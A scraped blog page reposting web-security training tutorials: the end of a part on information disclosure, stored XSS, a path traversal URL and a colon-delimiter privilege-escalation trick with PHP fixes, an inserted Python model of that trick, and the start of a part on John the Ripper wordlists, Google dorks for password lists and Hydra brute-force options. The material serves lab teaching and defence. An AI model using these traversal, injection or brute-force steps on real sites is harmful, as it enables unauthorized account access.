<span style="border: 0px; box-sizing: border-box; color: #4f81bd; font-family: inherit; font-size: 9pt; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Figure: How the comments file looks</span></span></div>
<pre class="brush: php; title: ; notranslate" style="border: 0px; box-sizing: border-box; color: #474747; font-family: inherit; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1.5em; margin-top: 1.5em; padding: 0px; vertical-align: baseline;" title=""><?php
// view_comments.php
// Split the file on the ":" delimiter and echo every comment, three fields at a time, inside the comments div
$comments = explode(":", file_get_contents($path . "comments.txt"));
echo "<div id='comments'>";
for ($i = 0; $i < count($comments) - 1; $i += 3) {
    echo "<p>User: " . $comments[$i] . "<br> posted about: " .
         $comments[$i + 1] . "<br> and he wrote: " . $comments[$i + 2];
    echo " </p>";
}
echo "</div>";
?>
</pre>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
This application works just fine when used as intended, but imagine a user requesting add_comment.php directly, without the file being included from index.php. This can easily happen: the name of the service hints at the file name, this particular file name is very common, and add_comment.php sits in the same directory, which makes it easy to find.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/082814_1337_WebsiteHack8.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; color: #4f81bd; font-family: inherit; font-size: 9pt; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Figure: Viewing add_comment.php on its own</span></span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Now the attacker knows that we have a variable called $path and can probably guess that it holds the path to the comments file, because there is a warning that file_get_contents(comments.txt) cannot be opened. Thus, he knows the name of the file that contains all our comments as well. Because the include fails, he also learns the whole include_path, which can be dangerous too. The attacker now also knows another file in our directory tree (view_comments.php), so he can request it and look for more errors. He also knows that this file works with the POST values from the form, as he can view the HTML and see that the names match.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
This comments form is also vulnerable to different code injection attacks. You can easily insert HTML markup in one of the comment fields to test it out. In that way, the users' browsers will execute any code that you like each time they visit the page.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
A probable solution is easy: wrap the POST values in the htmlspecialchars() function, which converts < and >, amongst others, into their HTML entities (&lt;, &gt;, etc.), preventing them from being interpreted as code.</div>
<pre class="brush: php; title: ; notranslate" style="border: 0px; box-sizing: border-box; color: #474747; font-family: inherit; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1.5em; margin-top: 1.5em; padding: 0px; vertical-align: baseline;" title="">$newcomment[] = htmlspecialchars($_POST["name"]);
$newcomment[] = htmlspecialchars($_POST["topic"]);
$newcomment[] = htmlspecialchars($_POST["message"]);
</pre>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; color: #4f81bd; font-family: inherit; font-size: 13pt; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-size: 17.3333px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Solution</span></span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
A simple solution to get rid of all those errors in this example is to wrap the code in add_comment.php and view_comments.php inside the following if statement:</div>
<pre class="brush: php; title: ; notranslate" style="border: 0px; box-sizing: border-box; color: #474747; font-family: inherit; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1.5em; margin-top: 1.5em; padding: 0px; vertical-align: baseline;" title="">if (isset($path)) {
    // code here
}
</pre>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
In that way, the code only executes when the files are included from index.php, presumably the only place where $path is defined.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Of course, that does not handle the issue that users can post the form empty and still view the content and make the application think there is an actual comment, but that can easily be fixed and is not the issue of discussion here.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Displaying errors is good for development purposes but when the application is live and in production – <span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><em style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">always turn off display_errors from the php.ini</em></span></div>
<h2 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 1.8em; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
Exercise 10: Delimiters</h2>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
We will be looking at a vulnerability similar to the one that existed in the old Poster website.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Sometimes, parameters used in the code can be abused by users even when they only interact with the interface provided to them.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Open Delimiters folder from your localhost in a browser. There is a users.txt file which contains all the user data. However, access to it is forbidden from the .htaccess file:</div>
<pre class="brush: plain; title: ; notranslate" style="border: 0px; box-sizing: border-box; color: #474747; font-family: inherit; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1.5em; margin-top: 1.5em; padding: 0px; vertical-align: baseline;" title=""><Files "users.txt">
Deny from all
</Files>
</pre>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Try to open it using the path traversal method of the article viewer, just for practice.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Look at the different data stored there and think about what everything represents.</div>
<ol style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin: 0px 1.5em 1.5em; padding: 0px; vertical-align: baseline;">
<li style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Try to login with one of the accounts and escalate your privileges to “admin” just by communicating with the website as normal.</li>
</ol>
<h3 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 1.6em; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
Spoiler</h3>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
http://localhost/2/PathTraversal/?article=../Delimiters/users.txt</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
// The path in the GET parameter should be valid as shown, but you have to fill in the path to the index.php yourself.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<img alt="" src="http://2we26u4fam7n16rz3a44uhbe1bq2.wpengine.netdna-cdn.com/wp-content/uploads/082814_1337_WebsiteHack9.png" style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; max-width: 100%; padding: 0px; vertical-align: baseline;" /></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
It should be clear that the “:” character is the delimiter between the different values.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
You can test on the login form, but it should be clear that the first word before the first delimiter is the username, the second is the password and the third is the user’s privileges.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
The code that extracts the user data one line at a time is the following:</div>
<pre class="brush: php; title: ; notranslate" style="border: 0px; box-sizing: border-box; color: #474747; font-family: inherit; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1.5em; margin-top: 1.5em; padding: 0px; vertical-align: baseline;" title="">$userlist = fopen('users.txt', 'r');
while (!feof($userlist)) {
$line = fgets($userlist);
$acc_details = explode(":", $line);
$username = $acc_details[0];
$password = $acc_details[1];
$access = $acc_details[2];
</pre>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Then, each line is checked separately with the submitted details to check whether It matches with them:</div>
<pre class="brush: php; title: ; notranslate" style="border: 0px; box-sizing: border-box; color: #474747; font-family: inherit; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1.5em; margin-top: 1.5em; padding: 0px; vertical-align: baseline;" title="">if ($username === $_POST["name"] && $password === $_POST["pass"]) {
</pre>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
When it finds a match, the user can be logged in.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Note that there are many better alternatives than this nowadays, such as using a database and cookies.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
When logged in, you have the option to change your username and/or password.</div>
<pre class="brush: php; title: ; notranslate" style="border: 0px; box-sizing: border-box; color: #474747; font-family: inherit; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1.5em; margin-top: 1.5em; padding: 0px; vertical-align: baseline;" title="">if (isset($_POST["pass"]) && trim($_POST['pass']) !== "") {
    // Replace the old password (userdata-pass) with the new one (pass) in the file contents
    $userlist = str_replace(/* old pass */ $_POST["userdata-pass"], /* new pass */ $_POST['pass'], $userlist);
    echo "<em>Password changed to: " . $_POST['pass'] . "</em>\n";
}
</pre>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
And to check the privileges, the script merely checks if there is a substring “admin” in the $access variable.</div>
<pre class="brush: php; title: ; notranslate" style="border: 0px; box-sizing: border-box; color: #474747; font-family: inherit; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1.5em; margin-top: 1.5em; padding: 0px; vertical-align: baseline;" title="">if (stripos($access, "admin") !== false) {
    echo '<img src="administrator.png" alt="admin" width="480" height="480" />
<h1>Howdy, admin!</h1>
';
}
</pre>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; text-decoration: underline; vertical-align: baseline;">Thus, it should be clear that you can abuse this mechanism by adding the : delimiter after your password and typing admin after it when you change your password.</span></div>
<h3 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 1.6em; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
Solution to this vulnerability</h3>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
The solution is easy and is the same as the previous exercise.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
We change the code slightly:</div>
<pre class="brush: php; title: ; notranslate" style="border: 0px; box-sizing: border-box; color: #474747; font-family: inherit; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1.5em; margin-top: 1.5em; padding: 0px; vertical-align: baseline;" title="">if (isset($_POST["usrname"]) && trim($_POST['usrname']) !== "") {
    // We remove any delimiters from the new account details and store the result in a variable
    $newacc = trim(str_replace(":", "", $_POST["usrname"]));
    // Then we replace the old value with the $newacc variable
    $userlist = str_replace($_POST["userdata-acc"], $newacc, $userlist);
    echo "&lt;em&gt;Username changed to: " . $_POST['usrname'] . "&lt;/em&gt;
    ";
}
</pre>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Besides sniffing and other problems, this website is again prone to information disclosure: the last iteration of the while loop yields an empty line, so a PHP error is raised each time a wrong password is submitted unless display_errors is set to off.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
You can do the following to avoid this as well:</div>
<pre class="brush: php; title: ; notranslate" style="border: 0px; box-sizing: border-box; color: #474747; font-family: inherit; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1.5em; margin-top: 1.5em; padding: 0px; vertical-align: baseline;" title="">if (trim($line) === "")
break;
</pre>
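The delimiter injection and the two fixes above, as an added Python model that is not the article's code: it assumes a username:password:access record layout and shows why stripping the delimiter and comparing the role exactly (rather than by substring) closes the hole.

```python
"""Added example (not the article's code): models the article's colon-delimited
user list, the unsanitised password change, the substring role check, and the
hardened versions.  The username:password:access record layout is an assumption."""

DELIM = ":"
ROLE_ADMIN = "admin"

# Constructed sample in the assumed layout, ending with the empty last line
# that the article's while loop spills out.
SAMPLE_USERLIST = "john:123:user\nalice:s3cret:admin\n"


def fields(line):
    """Split one record; extra fields after the third are ignored (assumed to
    mirror a PHP list($user, $pass, $access) = explode(':', $line))."""
    parts = line.split(DELIM)
    if len(parts) < 3:
        return None
    return parts[0], parts[1], parts[2]


def parse_userlist(text):
    """Return all well-formed records, skipping blank lines (the article's
    'if (trim($line) === "") break;' fix)."""
    records = []
    for line in text.split("\n"):
        if line.strip() == "":
            continue
        rec = fields(line)
        if rec is not None:
            records.append(rec)
    return records


def access_for(userlist, username):
    """Look up the access field of one user, or None if absent."""
    for user, _pw, access in parse_userlist(userlist):
        if user == username:
            return access
    return None


def change_password_vulnerable(userlist, old_password, new_password):
    """The article's original update: str_replace of the old password over the
    whole file text, so a new password of '123:admin' injects a new field (and
    any other record containing the old string is rewritten too)."""
    return userlist.replace(old_password, new_password)


def change_password_hardened(userlist, username, old_password, new_password):
    """The article's fix (strip the delimiter) plus, going beyond the article,
    a per-record rewrite so only the named user's password field changes."""
    clean = new_password.replace(DELIM, "").strip()
    out = []
    for line in userlist.split("\n"):
        if line.strip() == "":
            continue
        rec = fields(line)
        if rec is not None and rec[0] == username and rec[1] == old_password:
            line = DELIM.join((rec[0], clean, rec[2]))
        out.append(line)
    return "\n".join(out) + "\n"


def is_admin_substring(access):
    """The article's check: stripos($access, 'admin') !== false."""
    return ROLE_ADMIN in access.lower()


def is_admin_exact(access):
    """Exact comparison against the known role value; 'superadmin' or a
    smuggled 'admin' in another field no longer counts."""
    return access == ROLE_ADMIN


def demo():
    """john changes his password to '123:admin' on both versions of the site."""
    tampered = change_password_vulnerable(SAMPLE_USERLIST, "123", "123:admin")
    hardened = change_password_hardened(SAMPLE_USERLIST, "john", "123", "123:admin")
    vuln_access = access_for(tampered, "john")      # "admin": the injected field
    safe_access = access_for(hardened, "john")      # "user": delimiter stripped
    return {
        "vulnerable_access": vuln_access,
        "vulnerable_is_admin": is_admin_substring(vuln_access),
        "hardened_access": safe_access,
        "hardened_is_admin": is_admin_exact(safe_access),
    }


if __name__ == "__main__":
    print(demo())
```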
<h2 style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 1.8em; font-stretch: inherit; font-weight: inherit; line-height: 25.9px; margin: 1.25em 0px; padding: 0px; vertical-align: baseline;">
Conclusion</h2>
<div style="-webkit-text-stroke-width: 0px; border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: 25.9px; margin: 0px 0px 1em; orphans: auto; padding: 0px; text-align: start; text-indent: 0px; text-transform: none; vertical-align: baseline; white-space: normal; widows: 1; word-spacing: 0px;">
Sometimes the solutions to vulnerabilities are really simple and do not take much time; you just have to split the application into pieces and test each of them separately from the whole that is the application itself.</div>
</div>
Anonymoushttp://www.blogger.com/profile/14161834164641471363noreply@blogger.com0tag:blogger.com,1999:blog-185877282583432766.post-51618934285859914132016-01-07T14:24:00.002+05:302016-01-07T14:24:38.343+05:30Website Hacking part I: Using Hydra<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFPtUO-SMpMra7Pap9fwdY-quyx6ipc_hkmzbttOnvfZEb8Nq7-X6eI7PtFEJNGtB3_DO886wOcwdgVwX_Pxv-lUTP1hX_Uh-nBYAohpBXECFsgxIQsEMWzjWOG3z_HRtNL8hFKlJRKIs/s1600/Untitled.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFPtUO-SMpMra7Pap9fwdY-quyx6ipc_hkmzbttOnvfZEb8Nq7-X6eI7PtFEJNGtB3_DO886wOcwdgVwX_Pxv-lUTP1hX_Uh-nBYAohpBXECFsgxIQsEMWzjWOG3z_HRtNL8hFKlJRKIs/s1600/Untitled.png" height="228" width="400" /></a></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-size: 13pt; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: inherit; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;"><span style="border: 0px; box-sizing: border-box; font-family: inherit; font-size: 17.3333px; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Introduction</span></span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Websites are used daily by a large part of the world’s population to carry sensitive data from a person to an entity with online-based presence. In websites containing materials that are shown after authentication only, forms transfer data containing user credentials to server-side scripts. Users store their credit card details in their online accounts and use forms to buy items online, so it is crucial to keep the integrity, confidentiality and availability of this data intact.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
This article is written merely with penetration testing and website security in mind. Any attempts to penetrate into live systems on your behalf and without consent may lead to criminal proceedings.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
To try the training files that come along with this article, you need a local server such as XAMPP or WAMP with Apache and preferably MySQL turned on. If you are on Windows, to install Hydra you need to install the make, gcc and ssl libraries of Cygwin. Thereafter, you start it from the Cygwin Terminal. John the Ripper, on the other hand, can be started from the Command Prompt.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Download Files related to this article : <a href="http://resources.infosecinstitute.com/wp-content/uploads/WebsiteHacking101.rar" rel="nofollow" target="_blank">Download</a></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Exercise 1: Deep Data Hiding</span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
In the past, and even today, some people have used security through obscurity. This means that they have unprotected directories and files with the sole protection being that they do not have any backlinks and no links to them in the main site. Thus, if one knew the URL of the directory or file – he could readily access it. A common way to reveal obscure directories is to check the publicly visible robots.txt and see what is disallowed to be indexed by search engines.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Now open the DeepDataHiding folder through your localhost and try to find the hidden directory where uploaded .doc files from “users” are stored, then access it. If you upload a .doc file from the directory's main page to test this out, it won't leave your computer.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Exercise 2: Populating a Dictionary</span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
To populate a dictionary, we will be using John the Ripper. Open the PopulatingDictionary folder.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
You can populate a dictionary in John the Ripper and cut the output size by knowing the type of password (its maximum length, whether it should be only digits, contain special characters, etc.).</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
To create a simple dictionary and save it to a file, you can browse to the directory of the John the Ripper installation in CMD and use: john-mmx --incremental=alpha --stdout > filename, where filename is the name and location of the file in which the words should be saved.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
There are various options in the incremental mode, such as Digit (only digits), Lanman (letters, numbers and some special characters), Alpha (only letters) and All (all characters). Thus, you can also use john-mmx --incremental=lanman --stdout > wordlist.txt, etc.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Be aware that the size of the text file would probably get really big in just a couple of seconds, depending on your machine’s abilities.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Exercise 3: Acquiring user and password list for dictionary attacks</span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
Querying Google for passwords and user lists is usually pretty straightforward.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
You use something like filetype:lst password for passwords and filetype:lst user for username lists.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
We have included a sample username list and a password list downloaded from the Internet along with the attachment files to this article.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
<span style="border: 0px; box-sizing: border-box; font-family: inherit; font-stretch: inherit; font-style: inherit; font-variant: inherit; font-weight: 700; line-height: inherit; margin: 0px; padding: 0px; vertical-align: baseline;">Exercise 4: Breaking HTTPAuth</span></div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
For this exercise, we will be using Hydra and the user/pass lists included in the attachment files.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
When calling Hydra ($ hydra.exe), the parameter -L usrlistpath supplies the program with a path to a username list file whose usernames will be tested along with all the passwords until a match is found. -l username gives Hydra a single username, an option you can use if you know the username you are trying to break into but do not know the particular password.</div>
<div style="border: 0px; box-sizing: border-box; color: #474747; font-family: Montserrat, sans-serif; font-size: 14px; font-stretch: inherit; line-height: 25.9px; margin-bottom: 1em; padding: 0px; vertical-align: baseline;">
-P loads a password list while -p loads a single password.</div>
